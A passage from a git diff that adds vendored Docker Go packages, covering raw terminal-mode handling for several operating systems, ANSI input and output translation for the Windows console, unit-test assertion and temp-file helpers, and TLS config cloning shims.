disableNewlineAutoReturn is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil { + emulateStderr = true + } else { + winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing) + } + } + + if os.Getenv("ConEmuANSI") == "ON" || os.Getenv("ConsoleZVersion") != "" { + // The ConEmu and ConsoleZ terminals emulate ANSI on output streams well. + emulateStdin = true + emulateStdout = false + emulateStderr = false + } + + if emulateStdin { + stdIn = windows.NewAnsiReader(syscall.STD_INPUT_HANDLE) + } else { + stdIn = os.Stdin + } + + if emulateStdout { + stdOut = windows.NewAnsiWriter(syscall.STD_OUTPUT_HANDLE) + } else { + stdOut = os.Stdout + } + + if emulateStderr { + stdErr = windows.NewAnsiWriter(syscall.STD_ERROR_HANDLE) + } else { + stdErr = os.Stderr + } + + return +} + +// GetFdInfo returns the file descriptor for an os.File and indicates whether the file represents a terminal. +func GetFdInfo(in interface{}) (uintptr, bool) { + return windows.GetHandleInfo(in) +} + +// GetWinsize returns the window size based on the specified file descriptor. +func GetWinsize(fd uintptr) (*Winsize, error) { + info, err := winterm.GetConsoleScreenBufferInfo(fd) + if err != nil { + return nil, err + } + + winsize := &Winsize{ + Width: uint16(info.Window.Right - info.Window.Left + 1), + Height: uint16(info.Window.Bottom - info.Window.Top + 1), + } + + return winsize, nil +} + +// IsTerminal returns true if the given file descriptor is a terminal. +func IsTerminal(fd uintptr) bool { + return windows.IsConsole(fd) +} + +// RestoreTerminal restores the terminal connected to the given file descriptor +// to a previous state. +func RestoreTerminal(fd uintptr, state *State) error { + return winterm.SetConsoleMode(fd, state.mode) +} + +// SaveState saves the state of the terminal connected to the given file descriptor. +func SaveState(fd uintptr) (*State, error) { + mode, e := winterm.GetConsoleMode(fd) + if e != nil { + return nil, e + } + + return &State{mode: mode}, nil +} + +// DisableEcho disables echo for the terminal connected to the given file descriptor. +// -- See https://msdn.microsoft.com/en-us/library/windows/desktop/ms683462(v=vs.85).aspx +func DisableEcho(fd uintptr, state *State) error { + mode := state.mode + mode &^= winterm.ENABLE_ECHO_INPUT + mode |= winterm.ENABLE_PROCESSED_INPUT | winterm.ENABLE_LINE_INPUT + err := winterm.SetConsoleMode(fd, mode) + if err != nil { + return err + } + + // Register an interrupt handler to catch and restore prior state + restoreAtInterrupt(fd, state) + return nil +} + +// SetRawTerminal puts the terminal connected to the given file descriptor into +// raw mode and returns the previous state. On UNIX, this puts both the input +// and output into raw mode. On Windows, it only puts the input into raw mode. +func SetRawTerminal(fd uintptr) (*State, error) { + state, err := MakeRaw(fd) + if err != nil { + return nil, err + } + + // Register an interrupt handler to catch and restore prior state + restoreAtInterrupt(fd, state) + return state, err +} + +// SetRawTerminalOutput puts the output of terminal connected to the given file +// descriptor into raw mode. On UNIX, this does nothing and returns nil for the +// state. On Windows, it disables LF -> CRLF translation. +func SetRawTerminalOutput(fd uintptr) (*State, error) { + state, err := SaveState(fd) + if err != nil { + return nil, err + } + + // Ignore failures, since disableNewlineAutoReturn might not be supported on this + // version of Windows. + winterm.SetConsoleMode(fd, state.mode|disableNewlineAutoReturn) + return state, err +} + +// MakeRaw puts the terminal (Windows Console) connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be restored. +func MakeRaw(fd uintptr) (*State, error) { + state, err := SaveState(fd) + if err != nil { + return nil, err + } + + mode := state.mode + + // See + // -- https://msdn.microsoft.com/en-us/library/windows/desktop/ms686033(v=vs.85).aspx + // -- https://msdn.microsoft.com/en-us/library/windows/desktop/ms683462(v=vs.85).aspx + + // Disable these modes + mode &^= winterm.ENABLE_ECHO_INPUT + mode &^= winterm.ENABLE_LINE_INPUT + mode &^= winterm.ENABLE_MOUSE_INPUT + mode &^= winterm.ENABLE_WINDOW_INPUT + mode &^= winterm.ENABLE_PROCESSED_INPUT + + // Enable these modes + mode |= winterm.ENABLE_EXTENDED_FLAGS + mode |= winterm.ENABLE_INSERT_MODE + mode |= winterm.ENABLE_QUICK_EDIT_MODE + if vtInputSupported { + mode |= enableVirtualTerminalInput + } + + err = winterm.SetConsoleMode(fd, mode) + if err != nil { + return nil, err + } + return state, nil +} + +func restoreAtInterrupt(fd uintptr, state *State) { + sigchan := make(chan os.Signal, 1) + signal.Notify(sigchan, os.Interrupt) + + go func() { + _ = <-sigchan + RestoreTerminal(fd, state) + os.Exit(0) + }() +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_darwin.go b/vendor/github.com/docker/docker/pkg/term/termios_darwin.go new file mode 100644 index 0000000000..480db900ac --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_darwin.go @@ -0,0 +1,69 @@ +package term + +import ( + "syscall" + "unsafe" +) + +const ( + getTermios = syscall.TIOCGETA + setTermios = syscall.TIOCSETA +) + +// Termios magic numbers, passthrough to the ones defined in syscall. +const ( + IGNBRK = syscall.IGNBRK + PARMRK = syscall.PARMRK + INLCR = syscall.INLCR + IGNCR = syscall.IGNCR + ECHONL = syscall.ECHONL + CSIZE = syscall.CSIZE + ICRNL = syscall.ICRNL + ISTRIP = syscall.ISTRIP + PARENB = syscall.PARENB + ECHO = syscall.ECHO + ICANON = syscall.ICANON + ISIG = syscall.ISIG + IXON = syscall.IXON + BRKINT = syscall.BRKINT + INPCK = syscall.INPCK + OPOST = syscall.OPOST + CS8 = syscall.CS8 + IEXTEN = syscall.IEXTEN +) + +// Termios is the Unix API for terminal I/O. +type Termios struct { + Iflag uint64 + Oflag uint64 + Cflag uint64 + Lflag uint64 + Cc [20]byte + Ispeed uint64 + Ospeed uint64 +} + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) + newState.Oflag &^= OPOST + newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) + newState.Cflag &^= (CSIZE | PARENB) + newState.Cflag |= CS8 + newState.Cc[syscall.VMIN] = 1 + newState.Cc[syscall.VTIME] = 0 + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go b/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go new file mode 100644 index 0000000000..ed843ad69c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_freebsd.go @@ -0,0 +1,69 @@ +package term + +import ( + "syscall" + "unsafe" +) + +const ( + getTermios = syscall.TIOCGETA + setTermios = syscall.TIOCSETA +) + +// Termios magic numbers, passthrough to the ones defined in syscall. +const ( + IGNBRK = syscall.IGNBRK + PARMRK = syscall.PARMRK + INLCR = syscall.INLCR + IGNCR = syscall.IGNCR + ECHONL = syscall.ECHONL + CSIZE = syscall.CSIZE + ICRNL = syscall.ICRNL + ISTRIP = syscall.ISTRIP + PARENB = syscall.PARENB + ECHO = syscall.ECHO + ICANON = syscall.ICANON + ISIG = syscall.ISIG + IXON = syscall.IXON + BRKINT = syscall.BRKINT + INPCK = syscall.INPCK + OPOST = syscall.OPOST + CS8 = syscall.CS8 + IEXTEN = syscall.IEXTEN +) + +// Termios is the Unix API for terminal I/O. +type Termios struct { + Iflag uint32 + Oflag uint32 + Cflag uint32 + Lflag uint32 + Cc [20]byte + Ispeed uint32 + Ospeed uint32 +} + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) + newState.Oflag &^= OPOST + newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) + newState.Cflag &^= (CSIZE | PARENB) + newState.Cflag |= CS8 + newState.Cc[syscall.VMIN] = 1 + newState.Cc[syscall.VTIME] = 0 + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_linux.go b/vendor/github.com/docker/docker/pkg/term/termios_linux.go new file mode 100644 index 0000000000..22921b6aef --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_linux.go @@ -0,0 +1,47 @@ +// +build !cgo + +package term + +import ( + "syscall" + "unsafe" +) + +const ( + getTermios = syscall.TCGETS + setTermios = syscall.TCSETS +) + +// Termios is the Unix API for terminal I/O. +type Termios struct { + Iflag uint32 + Oflag uint32 + Cflag uint32 + Lflag uint32 + Cc [20]byte + Ispeed uint32 + Ospeed uint32 +} + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, getTermios, uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + + newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON) + newState.Oflag &^= syscall.OPOST + newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN) + newState.Cflag &^= (syscall.CSIZE | syscall.PARENB) + newState.Cflag |= syscall.CS8 + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go b/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go new file mode 100644 index 0000000000..ed843ad69c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go @@ -0,0 +1,69 @@ +package term + +import ( + "syscall" + "unsafe" +) + +const ( + getTermios = syscall.TIOCGETA + setTermios = syscall.TIOCSETA +) + +// Termios magic numbers, passthrough to the ones defined in syscall. +const ( + IGNBRK = syscall.IGNBRK + PARMRK = syscall.PARMRK + INLCR = syscall.INLCR + IGNCR = syscall.IGNCR + ECHONL = syscall.ECHONL + CSIZE = syscall.CSIZE + ICRNL = syscall.ICRNL + ISTRIP = syscall.ISTRIP + PARENB = syscall.PARENB + ECHO = syscall.ECHO + ICANON = syscall.ICANON + ISIG = syscall.ISIG + IXON = syscall.IXON + BRKINT = syscall.BRKINT + INPCK = syscall.INPCK + OPOST = syscall.OPOST + CS8 = syscall.CS8 + IEXTEN = syscall.IEXTEN +) + +// Termios is the Unix API for terminal I/O. +type Termios struct { + Iflag uint32 + Oflag uint32 + Cflag uint32 + Lflag uint32 + Cc [20]byte + Ispeed uint32 + Ospeed uint32 +} + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + return nil, err + } + + newState := oldState.termios + newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) + newState.Oflag &^= OPOST + newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) + newState.Cflag &^= (CSIZE | PARENB) + newState.Cflag |= CS8 + newState.Cc[syscall.VMIN] = 1 + newState.Cc[syscall.VTIME] = 0 + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { + return nil, err + } + + return &oldState, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go new file mode 100644 index 0000000000..cb0b88356d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go @@ -0,0 +1,263 @@ +// +build windows + +package windows + +import ( + "bytes" + "errors" + "fmt" + "io" + "os" + "strings" + "unsafe" + + ansiterm "github.com/Azure/go-ansiterm" + "github.com/Azure/go-ansiterm/winterm" +) + +const ( + escapeSequence = ansiterm.KEY_ESC_CSI +) + +// ansiReader wraps a standard input file (e.g., os.Stdin) providing ANSI sequence translation. +type ansiReader struct { + file *os.File + fd uintptr + buffer []byte + cbBuffer int + command []byte +} + +// NewAnsiReader returns an io.ReadCloser that provides VT100 terminal emulation on top of a +// Windows console input handle. +func NewAnsiReader(nFile int) io.ReadCloser { + initLogger() + file, fd := winterm.GetStdFile(nFile) + return &ansiReader{ + file: file, + fd: fd, + command: make([]byte, 0, ansiterm.ANSI_MAX_CMD_LENGTH), + buffer: make([]byte, 0), + } +} + +// Close closes the wrapped file. +func (ar *ansiReader) Close() (err error) { + return ar.file.Close() +} + +// Fd returns the file descriptor of the wrapped file. +func (ar *ansiReader) Fd() uintptr { + return ar.fd +} + +// Read reads up to len(p) bytes of translated input events into p. +func (ar *ansiReader) Read(p []byte) (int, error) { + if len(p) == 0 { + return 0, nil + } + + // Previously read bytes exist, read as much as we can and return + if len(ar.buffer) > 0 { + logger.Debugf("Reading previously cached bytes") + + originalLength := len(ar.buffer) + copiedLength := copy(p, ar.buffer) + + if copiedLength == originalLength { + ar.buffer = make([]byte, 0, len(p)) + } else { + ar.buffer = ar.buffer[copiedLength:] + } + + logger.Debugf("Read from cache p[%d]: % x", copiedLength, p) + return copiedLength, nil + } + + // Read and translate key events + events, err := readInputEvents(ar.fd, len(p)) + if err != nil { + return 0, err + } else if len(events) == 0 { + logger.Debug("No input events detected") + return 0, nil + } + + keyBytes := translateKeyEvents(events, []byte(escapeSequence)) + + // Save excess bytes and right-size keyBytes + if len(keyBytes) > len(p) { + logger.Debugf("Received %d keyBytes, only room for %d bytes", len(keyBytes), len(p)) + ar.buffer = keyBytes[len(p):] + keyBytes = keyBytes[:len(p)] + } else if len(keyBytes) == 0 { + logger.Debug("No key bytes returned from the translator") + return 0, nil + } + + copiedLength := copy(p, keyBytes) + if copiedLength != len(keyBytes) { + return 0, errors.New("unexpected copy length encountered") + } + + logger.Debugf("Read p[%d]: % x", copiedLength, p) + logger.Debugf("Read keyBytes[%d]: % x", copiedLength, keyBytes) + return copiedLength, nil +} + +// readInputEvents polls until at least one event is available. +func readInputEvents(fd uintptr, maxBytes int) ([]winterm.INPUT_RECORD, error) { + // Determine the maximum number of records to retrieve + // -- Cast around the type system to obtain the size of a single INPUT_RECORD. + // unsafe.Sizeof requires an expression vs. a type-reference; the casting + // tricks the type system into believing it has such an expression. + recordSize := int(unsafe.Sizeof(*((*winterm.INPUT_RECORD)(unsafe.Pointer(&maxBytes))))) + countRecords := maxBytes / recordSize + if countRecords > ansiterm.MAX_INPUT_EVENTS { + countRecords = ansiterm.MAX_INPUT_EVENTS + } else if countRecords == 0 { + countRecords = 1 + } + logger.Debugf("[windows] readInputEvents: Reading %v records (buffer size %v, record size %v)", countRecords, maxBytes, recordSize) + + // Wait for and read input events + events := make([]winterm.INPUT_RECORD, countRecords) + nEvents := uint32(0) + eventsExist, err := winterm.WaitForSingleObject(fd, winterm.WAIT_INFINITE) + if err != nil { + return nil, err + } + + if eventsExist { + err = winterm.ReadConsoleInput(fd, events, &nEvents) + if err != nil { + return nil, err + } + } + + // Return a slice restricted to the number of returned records + logger.Debugf("[windows] readInputEvents: Read %v events", nEvents) + return events[:nEvents], nil +} + +// KeyEvent Translation Helpers + +var arrowKeyMapPrefix = map[uint16]string{ + winterm.VK_UP: "%s%sA", + winterm.VK_DOWN: "%s%sB", + winterm.VK_RIGHT: "%s%sC", + winterm.VK_LEFT: "%s%sD", +} + +var keyMapPrefix = map[uint16]string{ + winterm.VK_UP: "\x1B[%sA", + winterm.VK_DOWN: "\x1B[%sB", + winterm.VK_RIGHT: "\x1B[%sC", + winterm.VK_LEFT: "\x1B[%sD", + winterm.VK_HOME: "\x1B[1%s~", // showkey shows ^[[1 + winterm.VK_END: "\x1B[4%s~", // showkey shows ^[[4 + winterm.VK_INSERT: "\x1B[2%s~", + winterm.VK_DELETE: "\x1B[3%s~", + winterm.VK_PRIOR: "\x1B[5%s~", + winterm.VK_NEXT: "\x1B[6%s~", + winterm.VK_F1: "", + winterm.VK_F2: "", + winterm.VK_F3: "\x1B[13%s~", + winterm.VK_F4: "\x1B[14%s~", + winterm.VK_F5: "\x1B[15%s~", + winterm.VK_F6: "\x1B[17%s~", + winterm.VK_F7: "\x1B[18%s~", + winterm.VK_F8: "\x1B[19%s~", + winterm.VK_F9: "\x1B[20%s~", + winterm.VK_F10: "\x1B[21%s~", + winterm.VK_F11: "\x1B[23%s~", + winterm.VK_F12: "\x1B[24%s~", +} + +// translateKeyEvents converts the input events into the appropriate ANSI string. +func translateKeyEvents(events []winterm.INPUT_RECORD, escapeSequence []byte) []byte { + var buffer bytes.Buffer + for _, event := range events { + if event.EventType == winterm.KEY_EVENT && event.KeyEvent.KeyDown != 0 { + buffer.WriteString(keyToString(&event.KeyEvent, escapeSequence)) + } + } + + return buffer.Bytes() +} + +// keyToString maps the given input event record to the corresponding string. +func keyToString(keyEvent *winterm.KEY_EVENT_RECORD, escapeSequence []byte) string { + if keyEvent.UnicodeChar == 0 { + return formatVirtualKey(keyEvent.VirtualKeyCode, keyEvent.ControlKeyState, escapeSequence) + } + + _, alt, control := getControlKeys(keyEvent.ControlKeyState) + if control { + // TODO(azlinux): Implement following control sequences + // -D Signals the end of input from the keyboard; also exits current shell. + // -H Deletes the first character to the left of the cursor. Also called the ERASE key. + // -Q Restarts printing after it has been stopped with -s. + // -S Suspends printing on the screen (does not stop the program). + // -U Deletes all characters on the current line. Also called the KILL key. + // -E Quits current command and creates a core + + } + + // +Key generates ESC N Key + if !control && alt { + return ansiterm.KEY_ESC_N + strings.ToLower(string(keyEvent.UnicodeChar)) + } + + return string(keyEvent.UnicodeChar) +} + +// formatVirtualKey converts a virtual key (e.g., up arrow) into the appropriate ANSI string. +func formatVirtualKey(key uint16, controlState uint32, escapeSequence []byte) string { + shift, alt, control := getControlKeys(controlState) + modifier := getControlKeysModifier(shift, alt, control) + + if format, ok := arrowKeyMapPrefix[key]; ok { + return fmt.Sprintf(format, escapeSequence, modifier) + } + + if format, ok := keyMapPrefix[key]; ok { + return fmt.Sprintf(format, modifier) + } + + return "" +} + +// getControlKeys extracts the shift, alt, and ctrl key states. +func getControlKeys(controlState uint32) (shift, alt, control bool) { + shift = 0 != (controlState & winterm.SHIFT_PRESSED) + alt = 0 != (controlState & (winterm.LEFT_ALT_PRESSED | winterm.RIGHT_ALT_PRESSED)) + control = 0 != (controlState & (winterm.LEFT_CTRL_PRESSED | winterm.RIGHT_CTRL_PRESSED)) + return shift, alt, control +} + +// getControlKeysModifier returns the ANSI modifier for the given combination of control keys. +func getControlKeysModifier(shift, alt, control bool) string { + if shift && alt && control { + return ansiterm.KEY_CONTROL_PARAM_8 + } + if alt && control { + return ansiterm.KEY_CONTROL_PARAM_7 + } + if shift && control { + return ansiterm.KEY_CONTROL_PARAM_6 + } + if control { + return ansiterm.KEY_CONTROL_PARAM_5 + } + if shift && alt { + return ansiterm.KEY_CONTROL_PARAM_4 + } + if alt { + return ansiterm.KEY_CONTROL_PARAM_3 + } + if shift { + return ansiterm.KEY_CONTROL_PARAM_2 + } + return "" +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go new file mode 100644 index 0000000000..a3ce5697d9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go @@ -0,0 +1,64 @@ +// +build windows + +package windows + +import ( + "io" + "os" + + ansiterm "github.com/Azure/go-ansiterm" + "github.com/Azure/go-ansiterm/winterm" +) + +// ansiWriter wraps a standard output file (e.g., os.Stdout) providing ANSI sequence translation. +type ansiWriter struct { + file *os.File + fd uintptr + infoReset *winterm.CONSOLE_SCREEN_BUFFER_INFO + command []byte + escapeSequence []byte + inAnsiSequence bool + parser *ansiterm.AnsiParser +} + +// NewAnsiWriter returns an io.Writer that provides VT100 terminal emulation on top of a +// Windows console output handle. +func NewAnsiWriter(nFile int) io.Writer { + initLogger() + file, fd := winterm.GetStdFile(nFile) + info, err := winterm.GetConsoleScreenBufferInfo(fd) + if err != nil { + return nil + } + + parser := ansiterm.CreateParser("Ground", winterm.CreateWinEventHandler(fd, file)) + logger.Infof("newAnsiWriter: parser %p", parser) + + aw := &ansiWriter{ + file: file, + fd: fd, + infoReset: info, + command: make([]byte, 0, ansiterm.ANSI_MAX_CMD_LENGTH), + escapeSequence: []byte(ansiterm.KEY_ESC_CSI), + parser: parser, + } + + logger.Infof("newAnsiWriter: aw.parser %p", aw.parser) + logger.Infof("newAnsiWriter: %v", aw) + return aw +} + +func (aw *ansiWriter) Fd() uintptr { + return aw.fd +} + +// Write writes len(p) bytes from p to the underlying data stream. +func (aw *ansiWriter) Write(p []byte) (total int, err error) { + if len(p) == 0 { + return 0, nil + } + + logger.Infof("Write: % x", p) + logger.Infof("Write: %s", string(p)) + return aw.parser.Parse(p) +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/console.go b/vendor/github.com/docker/docker/pkg/term/windows/console.go new file mode 100644 index 0000000000..ca5c3b2e53 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/console.go @@ -0,0 +1,35 @@ +// +build windows + +package windows + +import ( + "os" + + "github.com/Azure/go-ansiterm/winterm" +) + +// GetHandleInfo returns file descriptor and bool indicating whether the file is a console. +func GetHandleInfo(in interface{}) (uintptr, bool) { + switch t := in.(type) { + case *ansiReader: + return t.Fd(), true + case *ansiWriter: + return t.Fd(), true + } + + var inFd uintptr + var isTerminal bool + + if file, ok := in.(*os.File); ok { + inFd = file.Fd() + isTerminal = IsConsole(inFd) + } + return inFd, isTerminal +} + +// IsConsole returns true if the given file descriptor is a Windows Console. +// The code assumes that GetConsoleMode will return an error for file descriptors that are not a console. +func IsConsole(fd uintptr) bool { + _, e := winterm.GetConsoleMode(fd) + return e == nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows.go b/vendor/github.com/docker/docker/pkg/term/windows/windows.go new file mode 100644 index 0000000000..ce4cb5990e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/windows.go @@ -0,0 +1,33 @@ +// These files implement ANSI-aware input and output streams for use by the Docker Windows client. +// When asked for the set of standard streams (e.g., stdin, stdout, stderr), the code will create +// and return pseudo-streams that convert ANSI sequences to / from Windows Console API calls. + +package windows + +import ( + "io/ioutil" + "os" + "sync" + + ansiterm "github.com/Azure/go-ansiterm" + "github.com/Sirupsen/logrus" +) + +var logger *logrus.Logger +var initOnce sync.Once + +func initLogger() { + initOnce.Do(func() { + logFile := ioutil.Discard + + if isDebugEnv := os.Getenv(ansiterm.LogEnv); isDebugEnv == "1" { + logFile, _ = os.Create("ansiReaderWriter.log") + } + + logger = &logrus.Logger{ + Out: logFile, + Formatter: new(logrus.TextFormatter), + Level: logrus.DebugLevel, + } + }) +} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go new file mode 100644 index 0000000000..52aeab54ec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go @@ -0,0 +1,3 @@ +// This file is necessary to pass the Docker tests. + +package windows diff --git a/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go b/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go new file mode 100644 index 0000000000..6da8518a5e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go @@ -0,0 +1,97 @@ +// Package assert contains functions for making assertions in unit tests +package assert + +import ( + "fmt" + "path/filepath" + "reflect" + "runtime" + "strings" + + "github.com/davecgh/go-spew/spew" +) + +// TestingT is an interface which defines the methods of testing.T that are +// required by this package +type TestingT interface { + Fatalf(string, ...interface{}) +} + +// Equal compare the actual value to the expected value and fails the test if +// they are not equal. +func Equal(t TestingT, actual, expected interface{}) { + if expected != actual { + fatal(t, "Expected '%v' (%T) got '%v' (%T)", expected, expected, actual, actual) + } +} + +//EqualStringSlice compares two slices and fails the test if they do not contain +// the same items. +func EqualStringSlice(t TestingT, actual, expected []string) { + if len(actual) != len(expected) { + fatal(t, "Expected (length %d): %q\nActual (length %d): %q", + len(expected), expected, len(actual), actual) + } + for i, item := range actual { + if item != expected[i] { + fatal(t, "Slices differ at element %d, expected %q got %q", + i, expected[i], item) + } + } +} + +// NilError asserts that the error is nil, otherwise it fails the test. +func NilError(t TestingT, err error) { + if err != nil { + fatal(t, "Expected no error, got: %s", err.Error()) + } +} + +// DeepEqual compare the actual value to the expected value and fails the test if +// they are not "deeply equal". +func DeepEqual(t TestingT, actual, expected interface{}) { + if !reflect.DeepEqual(actual, expected) { + fatal(t, "Expected (%T):\n%v\n\ngot (%T):\n%s\n", + expected, spew.Sdump(expected), actual, spew.Sdump(actual)) + } +} + +// Error asserts that error is not nil, and contains the expected text, +// otherwise it fails the test. +func Error(t TestingT, err error, contains string) { + if err == nil { + fatal(t, "Expected an error, but error was nil") + } + + if !strings.Contains(err.Error(), contains) { + fatal(t, "Expected error to contain '%s', got '%s'", contains, err.Error()) + } +} + +// Contains asserts that the string contains a substring, otherwise it fails the +// test. +func Contains(t TestingT, actual, contains string) { + if !strings.Contains(actual, contains) { + fatal(t, "Expected '%s' to contain '%s'", actual, contains) + } +} + +// NotNil fails the test if the object is nil +func NotNil(t TestingT, obj interface{}) { + if obj == nil { + fatal(t, "Expected non-nil value.") + } +} + +func fatal(t TestingT, format string, args ...interface{}) { + t.Fatalf(errorSource()+format, args...) +} + +// See testing.decorate() +func errorSource() string { + _, filename, line, ok := runtime.Caller(3) + if !ok { + return "" + } + return fmt.Sprintf("%s:%d: ", filepath.Base(filename), line) +} diff --git a/vendor/github.com/docker/docker/pkg/testutil/pkg.go b/vendor/github.com/docker/docker/pkg/testutil/pkg.go new file mode 100644 index 0000000000..110b2e6a79 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/testutil/pkg.go @@ -0,0 +1 @@ +package testutil diff --git a/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go b/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go new file mode 100644 index 0000000000..0e09d99dae --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go @@ -0,0 +1,36 @@ +package tempfile + +import ( + "io/ioutil" + "os" + + "github.com/docker/docker/pkg/testutil/assert" +) + +// TempFile is a temporary file that can be used with unit tests. TempFile +// reduces the boilerplate setup required in each test case by handling +// setup errors. +type TempFile struct { + File *os.File +} + +// NewTempFile returns a new temp file with contents +func NewTempFile(t assert.TestingT, prefix string, content string) *TempFile { + file, err := ioutil.TempFile("", prefix+"-") + assert.NilError(t, err) + + _, err = file.Write([]byte(content)) + assert.NilError(t, err) + file.Close() + return &TempFile{File: file} +} + +// Name returns the filename +func (f *TempFile) Name() string { + return f.File.Name() +} + +// Remove removes the file +func (f *TempFile) Remove() { + os.Remove(f.Name()) +} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go new file mode 100644 index 0000000000..e4dec3a5d1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go @@ -0,0 +1,11 @@ +// +build go1.8 + +package tlsconfig + +import "crypto/tls" + +// Clone returns a clone of tls.Config. This function is provided for +// compatibility for go1.7 that doesn't include this method in stdlib. +func Clone(c *tls.Config) *tls.Config { + return c.Clone() +} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go new file mode 100644 index 0000000000..0b816650ec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go @@ -0,0 +1,31 @@ +// +build go1.6,!go1.7 + +package tlsconfig + +import "crypto/tls" + +// Clone returns a clone of tls.Config. This function is provided for +// compatibility for go1.6 that doesn't include this method in stdlib. +func Clone(c *tls.Config) *tls.Config { + return &tls.Config{ + Rand: c.Rand, + Time: c.Time, + Certificates: c.Certificates, + NameToCertificate: c.NameToCertificate, + GetCertificate: c.GetCertificate, + RootCAs: c.RootCAs, + NextProtos: c.NextProtos, + ServerName: c.ServerName, + ClientAuth: c.ClientAuth, + ClientCAs: c.ClientCAs, + InsecureSkipVerify: c.InsecureSkipVerify, + CipherSuites: c.CipherSuites, + PreferServerCipherSuites: c.PreferServerCipherSuites, + SessionTicketsDisabled: c.SessionTicketsDisabled, + SessionTicketKey: c.SessionTicketKey, + ClientSessionCache: c.ClientSessionCache, + MinVersion: c.MinVersion, + MaxVersion: c.MaxVersion, + CurvePreferences: c.CurvePreferences, + } +} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go 